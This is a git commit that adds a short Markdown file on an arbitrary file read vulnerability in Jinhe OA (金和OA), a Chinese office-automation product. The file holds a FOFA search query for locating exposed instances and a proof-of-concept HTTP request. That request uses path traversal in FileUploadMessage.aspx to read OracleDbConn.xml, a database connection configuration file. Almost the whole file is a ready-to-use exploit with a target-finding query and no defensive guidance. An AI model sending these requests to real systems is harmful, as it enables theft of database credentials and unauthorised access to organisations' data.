Create 金和OA任意文件读取漏洞.md

2023-11-07 13:01:36 +08:00 · 2023-11-07 13:01:36 +08:00 · 7ae091d695
commit 7ae091d695
parent 8299630e6c
1 changed files with 15 additions and 0 deletions
--- a/金和OA任意文件读取漏洞.md
+++ b/金和OA任意文件读取漏洞.md
@ -0,0 +1,15 @@
+## 金和OA任意文件读取漏洞
+
+## fofa
+```
+app="金和网络-金和OA"
+```
+
+## POC
+```
+GET /C6/JHSoft.WCF/FunctionNew/FileUploadMessage.aspx?filename=../../../C6/JhSoft.Web.Dossier.JG/JhSoft.Web.Dossier.JG/XMLFile/OracleDbConn.xml HTTP/1.1
+Host: 127.0.0.1
+User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
+Accept: */*
+Connection: Keep-Alive
+```